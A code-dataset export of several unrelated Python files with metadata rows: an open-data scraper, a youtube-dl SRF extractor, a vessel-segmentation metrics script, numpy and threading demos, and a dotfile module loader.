rec_dict['Available Formats'] = "XLS" rec_dict['Map URL'] = map_url rec_dict['Data URL'] = data_url my_csv.write_dataset(rec_dict) my_csv.close_csv() def extract_ducks(): ducks_url = site_list['ducks'][1] my_rest = rest.MyREST(ducks_url) services = my_rest.get_services() # Create CSV file csv_fn = "Ducks_results" field_names = ['Title', 'Type', 'Description', 'URL'] my_csv = shared.MyCSV(csv_fn, ducks_url, province, field_names) my_csv.open_csv() for service in services: if service['name'].find("SK") > -1: rec_dict = collections.OrderedDict((k, "") for k in field_names) #print service rec_dict['Title'] = service['name'] rec_dict['Type'] = service['type'] rec_dict['Description'] = shared.edit_description(service['serviceDescription']) rec_dict['URL'] = service['url'] my_csv.write_dataset(rec_dict) my_csv.close_csv() def main(): #city_list = ['Winnipeg', 'Brandon'] parser = argparse.ArgumentParser() parser.add_argument("-t", "--tool", help="The tool to use: %s or all" % ', '.join(site_list.keys())) #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") parser.add_argument("-s", "--silent", action='store_true', help="If used, no extra parameters will be queried.") args = parser.parse_args() #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) tool = args.tool #word = args.word #formats = args.format #html = args.html silent = args.silent #cat = args.category #downloadable = args.downloadable if tool is None: answer = raw_input("Please enter the site you would like to extract (%s): " % ', '.join(site_list.keys())) if not answer == "": tool = answer.lower() else: print "\nERROR: Please specify a site." print "Exiting process." sys.exit(1) # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() if tool == "all": for key, site in site_list.items(): eval(site_list[key][0]) else: if tool in site_list.keys(): eval(site_list[tool][0]) else: print "\nERROR: Invalid tool '%s'. Please enter one of the following: %s" % (tool, ', '.join(site_list.keys())) print "Exiting process." sys.exit(1) #geoportal_list = extract_geoportal(province) if __name__ == '__main__': sys.exit(main())
en
0.482465
# Get the shared.py # Create CSV file # Get a list of all the anchors in the treeview at the side of the page #print browse_url # Load the sub result # Determine the number of pages in the search # Load the current page # Get the resource list # Get the ID of the resource # Get the name of the resource # If the resource contains a map link, it will be included in the inventory # Get the URLs for the data #['Title', 'Available Formats', 'Map URL', 'Data URL'] # Create CSV file #print service #city_list = ['Winnipeg', 'Brandon'] #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) #word = args.word #formats = args.format #html = args.html #cat = args.category #downloadable = args.downloadable # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() #geoportal_list = extract_geoportal(province)
2.433635
2
youtube_dl/extractor/srf.py
zoogaezee/youtubeDL
0
6628999
# coding: utf-8 from __future__ import unicode_literals import re from .common import InfoExtractor from ..utils import ( determine_ext, parse_iso8601, xpath_text, ) class SrfIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/(?:tv|radio)/[^/]+/(?P<media_type>video|audio)/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})' _TESTS = [{ 'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'md5': '4cd93523723beff51bb4bee974ee238d', 'info_dict': { 'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'display_id': 'snowden-beantragt-asyl-in-russland', 'ext': 'm4v', 'upload_date': '20130701', 'title': 'Snowden beantragt Asyl in Russland', 'timestamp': 1372713995, } }, { # No Speichern (Save) button 'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa', 'md5': 'd97e236e80d1d24729e5d0953d276a4f', 'info_dict': { 'id': '677f5829-e473-4823-ac83-a1087fe97faa', 'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive', 'ext': 'flv', 'upload_date': '20130710', 'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive', 'timestamp': 1373493600, }, }, { 'url': 'http://www.srf.ch/play/radio/hoerspielarchiv-srf-musikwelle/audio/saegel-ohni-wind-von-jakob-stebler?id=415bf3d3-6429-4de7-968d-95866e37cfbc', 'md5': '', 'info_dict': { 'id': '415bf3d3-6429-4de7-968d-95866e37cfbc', 'display_id': 'saegel-ohni-wind-von-jakob-stebler', 'ext': 'mp3', 'upload_date': '20080518', 'title': '«Sägel ohni Wind» von J<NAME>', 'timestamp': 1211112000, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { 'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }, { 'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') media_type = mobj.group('media_type') display_id = mobj.group('display_id') or video_id video_data = self._download_xml( 'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/%s/play/%s.xml' % (media_type, video_id), display_id) title = xpath_text( video_data, './AssetMetadatas/AssetMetadata/title', fatal=True) thumbnails = [{ 'url': s.text } for s in video_data.findall('.//ImageRepresentation/url')] timestamp = parse_iso8601(xpath_text(video_data, './createdDate')) # The <duration> field in XML is different from the exact duration, skipping formats = [] for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'): for url_node in item.findall('url'): quality = url_node.attrib['quality'] full_url = url_node.text original_ext = determine_ext(full_url).lower() format_id = '%s-%s' % (quality, item.attrib['protocol']) if original_ext == 'f4m': formats.extend(self._extract_f4m_formats( full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id)) elif original_ext == 'm3u8': formats.extend(self._extract_m3u8_formats( full_url, display_id, 'mp4', m3u8_id=format_id)) else: formats.append({ 'url': full_url, 'ext': original_ext, 'format_id': format_id, 'quality': 0 if 'HD' in quality else -1, 'preference': 1, }) self._sort_formats(formats) subtitles = {} subtitles_data = video_data.find('Subtitles') if subtitles_data is not None: subtitles_list = [{ 'url': sub.text, 'ext': determine_ext(sub.text), } for sub in subtitles_data] if subtitles_list: subtitles['de'] = subtitles_list return { 'id': video_id, 'display_id': display_id, 'formats': formats, 'title': title, 'thumbnails': thumbnails, 'timestamp': timestamp, 'subtitles': subtitles, }
# coding: utf-8 from __future__ import unicode_literals import re from .common import InfoExtractor from ..utils import ( determine_ext, parse_iso8601, xpath_text, ) class SrfIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/(?:tv|radio)/[^/]+/(?P<media_type>video|audio)/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})' _TESTS = [{ 'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'md5': '4cd93523723beff51bb4bee974ee238d', 'info_dict': { 'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'display_id': 'snowden-beantragt-asyl-in-russland', 'ext': 'm4v', 'upload_date': '20130701', 'title': 'Snowden beantragt Asyl in Russland', 'timestamp': 1372713995, } }, { # No Speichern (Save) button 'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa', 'md5': 'd97e236e80d1d24729e5d0953d276a4f', 'info_dict': { 'id': '677f5829-e473-4823-ac83-a1087fe97faa', 'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive', 'ext': 'flv', 'upload_date': '20130710', 'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive', 'timestamp': 1373493600, }, }, { 'url': 'http://www.srf.ch/play/radio/hoerspielarchiv-srf-musikwelle/audio/saegel-ohni-wind-von-jakob-stebler?id=415bf3d3-6429-4de7-968d-95866e37cfbc', 'md5': '', 'info_dict': { 'id': '415bf3d3-6429-4de7-968d-95866e37cfbc', 'display_id': 'saegel-ohni-wind-von-jakob-stebler', 'ext': 'mp3', 'upload_date': '20080518', 'title': '«Sägel ohni Wind» von J<NAME>', 'timestamp': 1211112000, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { 'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }, { 'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') media_type = mobj.group('media_type') display_id = mobj.group('display_id') or video_id video_data = self._download_xml( 'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/%s/play/%s.xml' % (media_type, video_id), display_id) title = xpath_text( video_data, './AssetMetadatas/AssetMetadata/title', fatal=True) thumbnails = [{ 'url': s.text } for s in video_data.findall('.//ImageRepresentation/url')] timestamp = parse_iso8601(xpath_text(video_data, './createdDate')) # The <duration> field in XML is different from the exact duration, skipping formats = [] for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'): for url_node in item.findall('url'): quality = url_node.attrib['quality'] full_url = url_node.text original_ext = determine_ext(full_url).lower() format_id = '%s-%s' % (quality, item.attrib['protocol']) if original_ext == 'f4m': formats.extend(self._extract_f4m_formats( full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id)) elif original_ext == 'm3u8': formats.extend(self._extract_m3u8_formats( full_url, display_id, 'mp4', m3u8_id=format_id)) else: formats.append({ 'url': full_url, 'ext': original_ext, 'format_id': format_id, 'quality': 0 if 'HD' in quality else -1, 'preference': 1, }) self._sort_formats(formats) subtitles = {} subtitles_data = video_data.find('Subtitles') if subtitles_data is not None: subtitles_list = [{ 'url': sub.text, 'ext': determine_ext(sub.text), } for sub in subtitles_data] if subtitles_list: subtitles['de'] = subtitles_list return { 'id': video_id, 'display_id': display_id, 'formats': formats, 'title': title, 'thumbnails': thumbnails, 'timestamp': timestamp, 'subtitles': subtitles, }
en
0.831412
# coding: utf-8 # No Speichern (Save) button # requires rtmpdump # The <duration> field in XML is different from the exact duration, skipping
2.091546
2
eval.py
Limingxing00/Retinal-Vessel-Segmentation-ISBI2022
9
6629000
<reponame>Limingxing00/Retinal-Vessel-Segmentation-ISBI2022<gh_stars>1-10 import numpy as np from matplotlib import pyplot as plt # scikit learn from sklearn.metrics import roc_curve from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import precision_recall_curve from sklearn.metrics import jaccard_similarity_score from sklearn.metrics import f1_score import numpy as np from PIL import Image from sklearn.metrics import f1_score from sklearn.metrics import accuracy_score, roc_curve, auc, classification_report, roc_auc_score import os import yaml import pdb from lib.config import parse_args import warnings warnings.filterwarnings("ignore") """ calculate metrics for entire retinal vessel images. """ def metrics(label_path, prediction_path, cfg): """ :param foreground: pixel value 255 is foreground. """ label_file_name = sorted(os.listdir(label_path)) pred_file_name = sorted(os.listdir(prediction_path)) f1m = [] accm = [] aucm = [] specificitym = [] precisionm = [] sensitivitym = [] # pdb.set_trace() for i in range(len(label_file_name)): label = Image.open(label_path + "/" + label_file_name[i]) label = np.array(label) # label[label <= 128] = 0 # label[label > 128] = 1 pred = Image.open(prediction_path + "/" + pred_file_name[i]) pred = (np.array(pred)).flatten() / 255 if label.max()==1: label = (label).astype(np.uint8).flatten() elif label.max()==255: label = (label).astype(np.uint8).flatten() / 255 else: raise RuntimeError('Please check your label.') # pdb.set_trace() # check the pixel value # pdb.set_trace() assert label.max() == 1 and (pred).max() <= 1 assert label.min() == 0 and (pred).min() >= 0 # test another datasets ISBI 2012 if cfg['DATASET'] == "ISBI2012": label = 1 - label pred = 1 - pred y_scores, y_true = pred, label # Area under the ROC curve # pdb.set_trace() fpr, tpr, thresholds = roc_curve((y_true), y_scores) AUC_ROC = roc_auc_score(y_true, y_scores) # test_integral = np.trapz(tpr,fpr) #trapz is numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve precision, recall, thresholds = precision_recall_curve(y_true, y_scores) precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC) recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC) AUC_prec_rec = np.trapz(precision, recall) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix threshold_confusion = 0.5 # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) y_pred = np.empty((y_scores.shape[0])) for i in range(y_scores.shape[0]): if y_scores[i] >= threshold_confusion: y_pred[i] = 1 else: y_pred[i] = 0 confusion = confusion_matrix(y_true, y_pred) # print (confusion) accuracy = 0 if float(np.sum(confusion)) != 0: accuracy = float(confusion[0, 0] + confusion[1, 1]) / float(np.sum(confusion)) # print ("Global Accuracy: " +str(accuracy)) specificity = 0 if float(confusion[0, 0] + confusion[0, 1]) != 0: specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1]) # print ("Specificity: " +str(specificity)) sensitivity = 0 if float(confusion[1, 1] + confusion[1, 0]) != 0: sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0]) # print ("Sensitivity: " +str(sensitivity)) precision = 0 if float(confusion[1, 1] + confusion[0, 1]) != 0: precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1]) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score F1_score = f1_score(y_true, y_pred, average='binary') # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) f1m.append(F1_score) accm.append(accuracy) aucm.append(AUC_ROC) specificitym.append(specificity) precisionm.append(precision) sensitivitym.append(sensitivity) # print("Your score of new data is {}".format(np.array(f1m).mean())) return np.array(f1m).mean(), np.array(accm).mean(), np.array(aucm).mean(), np.array(specificitym).mean(), np.array( precisionm).mean(), np.array(sensitivitym).mean() if __name__ == "__main__": args = parse_args() f = open(args.cfg_file) cfg = yaml.load(f) # pdb.set_trace() f1, acc, auc, specificity, precision, sensitivity = metrics(label_path=cfg['TEST_LABEL_PATH'], prediction_path=cfg['TEST_PRED_PATH'], cfg=cfg) print("f1", f1, "accuracy", acc, "auc", auc, "specificity", specificity, "precision", precision, "sensitivity", sensitivity) # ====== Evaluate the results
import numpy as np from matplotlib import pyplot as plt # scikit learn from sklearn.metrics import roc_curve from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import precision_recall_curve from sklearn.metrics import jaccard_similarity_score from sklearn.metrics import f1_score import numpy as np from PIL import Image from sklearn.metrics import f1_score from sklearn.metrics import accuracy_score, roc_curve, auc, classification_report, roc_auc_score import os import yaml import pdb from lib.config import parse_args import warnings warnings.filterwarnings("ignore") """ calculate metrics for entire retinal vessel images. """ def metrics(label_path, prediction_path, cfg): """ :param foreground: pixel value 255 is foreground. """ label_file_name = sorted(os.listdir(label_path)) pred_file_name = sorted(os.listdir(prediction_path)) f1m = [] accm = [] aucm = [] specificitym = [] precisionm = [] sensitivitym = [] # pdb.set_trace() for i in range(len(label_file_name)): label = Image.open(label_path + "/" + label_file_name[i]) label = np.array(label) # label[label <= 128] = 0 # label[label > 128] = 1 pred = Image.open(prediction_path + "/" + pred_file_name[i]) pred = (np.array(pred)).flatten() / 255 if label.max()==1: label = (label).astype(np.uint8).flatten() elif label.max()==255: label = (label).astype(np.uint8).flatten() / 255 else: raise RuntimeError('Please check your label.') # pdb.set_trace() # check the pixel value # pdb.set_trace() assert label.max() == 1 and (pred).max() <= 1 assert label.min() == 0 and (pred).min() >= 0 # test another datasets ISBI 2012 if cfg['DATASET'] == "ISBI2012": label = 1 - label pred = 1 - pred y_scores, y_true = pred, label # Area under the ROC curve # pdb.set_trace() fpr, tpr, thresholds = roc_curve((y_true), y_scores) AUC_ROC = roc_auc_score(y_true, y_scores) # test_integral = np.trapz(tpr,fpr) #trapz is numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve precision, recall, thresholds = precision_recall_curve(y_true, y_scores) precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC) recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC) AUC_prec_rec = np.trapz(precision, recall) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix threshold_confusion = 0.5 # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) y_pred = np.empty((y_scores.shape[0])) for i in range(y_scores.shape[0]): if y_scores[i] >= threshold_confusion: y_pred[i] = 1 else: y_pred[i] = 0 confusion = confusion_matrix(y_true, y_pred) # print (confusion) accuracy = 0 if float(np.sum(confusion)) != 0: accuracy = float(confusion[0, 0] + confusion[1, 1]) / float(np.sum(confusion)) # print ("Global Accuracy: " +str(accuracy)) specificity = 0 if float(confusion[0, 0] + confusion[0, 1]) != 0: specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1]) # print ("Specificity: " +str(specificity)) sensitivity = 0 if float(confusion[1, 1] + confusion[1, 0]) != 0: sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0]) # print ("Sensitivity: " +str(sensitivity)) precision = 0 if float(confusion[1, 1] + confusion[0, 1]) != 0: precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1]) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score F1_score = f1_score(y_true, y_pred, average='binary') # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) f1m.append(F1_score) accm.append(accuracy) aucm.append(AUC_ROC) specificitym.append(specificity) precisionm.append(precision) sensitivitym.append(sensitivity) # print("Your score of new data is {}".format(np.array(f1m).mean())) return np.array(f1m).mean(), np.array(accm).mean(), np.array(aucm).mean(), np.array(specificitym).mean(), np.array( precisionm).mean(), np.array(sensitivitym).mean() if __name__ == "__main__": args = parse_args() f = open(args.cfg_file) cfg = yaml.load(f) # pdb.set_trace() f1, acc, auc, specificity, precision, sensitivity = metrics(label_path=cfg['TEST_LABEL_PATH'], prediction_path=cfg['TEST_PRED_PATH'], cfg=cfg) print("f1", f1, "accuracy", acc, "auc", auc, "specificity", specificity, "precision", precision, "sensitivity", sensitivity) # ====== Evaluate the results
en
0.611579
# scikit learn calculate metrics for entire retinal vessel images. :param foreground: pixel value 255 is foreground. # pdb.set_trace() # label[label <= 128] = 0 # label[label > 128] = 1 # pdb.set_trace() # check the pixel value # pdb.set_trace() # test another datasets ISBI 2012 # Area under the ROC curve # pdb.set_trace() # test_integral = np.trapz(tpr,fpr) #trapz is numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve # so the array is increasing (you won't get negative AUC) # so the array is increasing (you won't get negative AUC) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) # print (confusion) # print ("Global Accuracy: " +str(accuracy)) # print ("Specificity: " +str(specificity)) # print ("Sensitivity: " +str(sensitivity)) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) # print("Your score of new data is {}".format(np.array(f1m).mean())) # pdb.set_trace() # ====== Evaluate the results
2.434173
2
numpy_summation.py
khinthandarkyaw98/Python_Practice
0
6629001
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element import numpy as np arr1 = np.array([1, 2, 3]) arr2 = np.array([4, 5, 6]) newarr = np.add(arr1, arr2) print("add():", newarr) newarr = np.sum([arr1, arr2]) # note that sum([]) print("sum(): ", newarr) # Summation over an axis newarr = np.sum([arr1, arr2], axis = 1) print("sum() over an axis", newarr) # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np arr = np.array([1, 2, 3]) print("cummulative Sum: ", np.cumsum(arr))
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element import numpy as np arr1 = np.array([1, 2, 3]) arr2 = np.array([4, 5, 6]) newarr = np.add(arr1, arr2) print("add():", newarr) newarr = np.sum([arr1, arr2]) # note that sum([]) print("sum(): ", newarr) # Summation over an axis newarr = np.sum([arr1, arr2], axis = 1) print("sum() over an axis", newarr) # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np arr = np.array([1, 2, 3]) print("cummulative Sum: ", np.cumsum(arr))
en
0.741707
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element # note that sum([]) # Summation over an axis # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np
4.294552
4
tests/threading_demo.py
liunx/vimusic
0
6629002
#!/usr/bin/env python3 import threading import queue import time def worker(q): """thread worker function""" while True: if not q.empty(): item = q.get_nowait() print(item) q.task_done() if item == 99: break time.sleep(0.001) if __name__ == "__main__": q = queue.Queue() t = threading.Thread(target=worker, args=(q,)) t.start() for i in range(10): q.put([1,2,3]) time.sleep(1) q.put(99)
#!/usr/bin/env python3 import threading import queue import time def worker(q): """thread worker function""" while True: if not q.empty(): item = q.get_nowait() print(item) q.task_done() if item == 99: break time.sleep(0.001) if __name__ == "__main__": q = queue.Queue() t = threading.Thread(target=worker, args=(q,)) t.start() for i in range(10): q.put([1,2,3]) time.sleep(1) q.put(99)
en
0.315547
#!/usr/bin/env python3 thread worker function
3.406824
3
dotmodules/modules/modules.py
dotmodules/dm
0
6629003
from collections import OrderedDict from dataclasses import dataclass from enum import Enum from pathlib import Path from typing import Dict, Generator, List, Sequence from dotmodules.modules.hooks import ( Hook, LinkCleanUpHook, LinkDeploymentHook, ShellScriptHook, ) from dotmodules.modules.links import LinkItem from dotmodules.modules.loader import ConfigLoader, LoaderError from dotmodules.modules.parser import ( ConfigParser, HookItemDict, LinkItemDict, ParserError, ) from dotmodules.modules.path import PathManager class ModuleError(Exception): """ Exception that will be raised on module level errors. """ class ModuleStatus(str, Enum): DISABLED: str = "disabled" DEPLOYED: str = "deployed" PENDING: str = "pending" ERROR: str = "error" @dataclass class Module: root: Path name: str version: str enabled: bool documentation: Sequence[str] variables: Dict[str, List[str]] links: Sequence[LinkItem] hooks: Sequence[Hook] @classmethod def from_path(cls, path: Path) -> "Module": module_root = path.parent.resolve() try: loader = ConfigLoader.get_loader_for_config_file(config_file_path=path) parser = ConfigParser(loader=loader) name = parser.parse_name() version = parser.parse_version() enabled = parser.parse_enabled() documentation = parser.parse_documentation() variables = parser.parse_variables() link_items = parser.parse_links() hook_items = parser.parse_hooks() links = cls._create_links(link_items=link_items) hooks = cls._create_hooks(hook_items=hook_items) cls._validate_hooks(hooks=hooks) if links: hooks += cls._create_default_link_hooks(links=links) except LoaderError as e: raise ModuleError(f"Configuration loading error: {e}") from e except ParserError as e: raise ModuleError(f"Configuration syntax error: {e}") from e except Exception as e: raise ModuleError( f"Unexpected error happened during module loading: {e}" ) from e module = cls( name=name, version=version, enabled=enabled, documentation=documentation, variables=variables, root=module_root, links=links, hooks=hooks, ) return module @staticmethod def _create_links(link_items: List[LinkItemDict]) -> List[LinkItem]: links = [] for link_item in link_items: link = LinkItem( path_to_target=link_item["path_to_target"], path_to_symlink=link_item["path_to_symlink"], name=link_item["name"], ) links.append(link) return links @staticmethod def _create_hooks( hook_items: List[HookItemDict], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook] = [] for hook_item in hook_items: hook = ShellScriptHook( path_to_script=hook_item["path_to_script"], priority=hook_item["priority"], name=hook_item["name"], ) hooks.append(hook) return hooks @staticmethod def _validate_hooks( hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook], ) -> None: for index, _hook in enumerate(hooks, start=1): hook_name = _hook.hook_name if hook_name in [LinkDeploymentHook.NAME, LinkCleanUpHook.NAME]: raise ParserError( f"Cannot use reserved hook name '{hook_name}' in section " f"'hooks' at index {index}!" ) @staticmethod def _create_default_link_hooks( links: List[LinkItem], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: return [ LinkDeploymentHook(links=links), LinkCleanUpHook(links=links), ] @property def status(self) -> ModuleStatus: if self.errors: return ModuleStatus.ERROR if not self.enabled: return ModuleStatus.DISABLED path_manager = PathManager(root_path=self.root) if all( [ link.check_if_link_exists(path_manager=path_manager) and link.check_if_target_matched(path_manager=path_manager) for link in self.links ] ): return ModuleStatus.DEPLOYED return ModuleStatus.PENDING @property def errors(self) -> List[str]: path_manager = PathManager(root_path=self.root) errors = [] for link in self.links: errors += link.report_errors(path_manager=path_manager) for hook in self.hooks: errors += hook.report_errors(path_manager=path_manager) return errors @dataclass class HookAggregate: module: Module hook: Hook class Modules: """ Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. """ def __init__(self) -> None: self.modules: List[Module] = [] def __len__(self) -> int: return len(self.modules) @staticmethod def _config_file_paths( modules_root_path: Path, config_file_name: str ) -> Generator[Path, None, None]: return Path(modules_root_path).rglob(config_file_name) @classmethod def load(cls, modules_root_path: Path, config_file_name: str) -> "Modules": modules = cls() config_file_paths = cls._config_file_paths( modules_root_path=modules_root_path, config_file_name=config_file_name ) for config_file_path in config_file_paths: try: module = Module.from_path(path=config_file_path) except ModuleError as e: raise ModuleError( f"Error while loading module at path '{config_file_path}': {e}" ) from e modules.modules.append(module) # Sorting the modules in alphabetical path order. modules.modules.sort(key=lambda m: str(m.root)) return modules @property def variables(self) -> Dict[str, List[str]]: vars = {} for module in self.modules: if not module.enabled: continue for name, values in module.variables.items(): if name not in vars: vars[name] = list(values) else: for value in values: if value not in vars[name]: vars[name] += values vars[name].sort() return vars @property def hooks(self) -> OrderedDict[str, List[HookAggregate]]: hooks: OrderedDict[str, List[HookAggregate]] = OrderedDict() for module in self.modules: if not module.enabled: continue for hook in module.hooks: hook_name = hook.hook_name if hook_name not in hooks: hooks[hook_name] = [] hooks[hook_name].append(HookAggregate(module=module, hook=hook)) for _, values in hooks.items(): values.sort(key=lambda item: item.hook.hook_priority) return hooks
from collections import OrderedDict from dataclasses import dataclass from enum import Enum from pathlib import Path from typing import Dict, Generator, List, Sequence from dotmodules.modules.hooks import ( Hook, LinkCleanUpHook, LinkDeploymentHook, ShellScriptHook, ) from dotmodules.modules.links import LinkItem from dotmodules.modules.loader import ConfigLoader, LoaderError from dotmodules.modules.parser import ( ConfigParser, HookItemDict, LinkItemDict, ParserError, ) from dotmodules.modules.path import PathManager class ModuleError(Exception): """ Exception that will be raised on module level errors. """ class ModuleStatus(str, Enum): DISABLED: str = "disabled" DEPLOYED: str = "deployed" PENDING: str = "pending" ERROR: str = "error" @dataclass class Module: root: Path name: str version: str enabled: bool documentation: Sequence[str] variables: Dict[str, List[str]] links: Sequence[LinkItem] hooks: Sequence[Hook] @classmethod def from_path(cls, path: Path) -> "Module": module_root = path.parent.resolve() try: loader = ConfigLoader.get_loader_for_config_file(config_file_path=path) parser = ConfigParser(loader=loader) name = parser.parse_name() version = parser.parse_version() enabled = parser.parse_enabled() documentation = parser.parse_documentation() variables = parser.parse_variables() link_items = parser.parse_links() hook_items = parser.parse_hooks() links = cls._create_links(link_items=link_items) hooks = cls._create_hooks(hook_items=hook_items) cls._validate_hooks(hooks=hooks) if links: hooks += cls._create_default_link_hooks(links=links) except LoaderError as e: raise ModuleError(f"Configuration loading error: {e}") from e except ParserError as e: raise ModuleError(f"Configuration syntax error: {e}") from e except Exception as e: raise ModuleError( f"Unexpected error happened during module loading: {e}" ) from e module = cls( name=name, version=version, enabled=enabled, documentation=documentation, variables=variables, root=module_root, links=links, hooks=hooks, ) return module @staticmethod def _create_links(link_items: List[LinkItemDict]) -> List[LinkItem]: links = [] for link_item in link_items: link = LinkItem( path_to_target=link_item["path_to_target"], path_to_symlink=link_item["path_to_symlink"], name=link_item["name"], ) links.append(link) return links @staticmethod def _create_hooks( hook_items: 